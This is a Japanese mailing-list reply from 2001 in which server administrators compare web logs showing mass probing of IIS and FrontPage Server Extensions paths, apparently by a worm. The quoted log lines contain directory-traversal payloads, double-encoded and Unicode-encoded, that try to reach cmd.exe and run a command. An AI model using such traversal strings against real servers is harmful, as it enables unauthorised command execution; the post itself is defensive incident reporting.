[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:04661] Re: FrontPage Server Extensions への攻撃 ?
- To: connect24h@xxxxxxxxxxxxxxxxxxxx
- Subject: [connect24h:04661] Re: FrontPage Server Extensions への攻撃 ?
- From: Hiroshi Uchiyama <utchy@xxxxxx>
- Date: Tue, 18 Sep 2001 23:32:45 +0900
ウチヤマ です。
// at 2001/09/18 22:56:36
// "[connect24h:04641] FrontPage Server Extensions への攻撃 ?"
// HIRAMOTO Kouji wrote...
> 今日になって急に
同じく...
> XXX.XX.XXX.XX - - [18/Sep/2001:22:49:46 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
> に代表されるような FrontPage Server Extensions (って Windows系?)狙
> いのクラックが大量にくるようになったのですが、これって何か周期とか、
> 攻撃先決定ルールとか、あるんでしょうか?
xxx.xxx.xxx.xxx - - [18/Sep/2001:22:59:25 +0900] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
280 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:22:59:26 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 280 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:22:59:26 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:22:59:26 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
xxx.xxx.xxx.xxx - - [18/Sep/2001:22:59:27 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 "-" "-"
このようなログが様々なIPアドレスからやって来ます。
CodeRed[II]では限られたアドレスブロックから攻撃されたいたような
雰囲気なのですが、こちらはいろんな所からやって来ます。
とりあえず、whoisで調べて一箇所には警告しておきましたが...
これ、CodeGreenなのかな...?
--
mail: utchy@xxxxxx utchy@xxxxxxxxx
web : http://www.utchy.com/
------------------------------------------------------------------------
ニュース速報! はインフォシークで!!
http://www.infoseek.co.jp/Home?pg=Home.html&svx=971122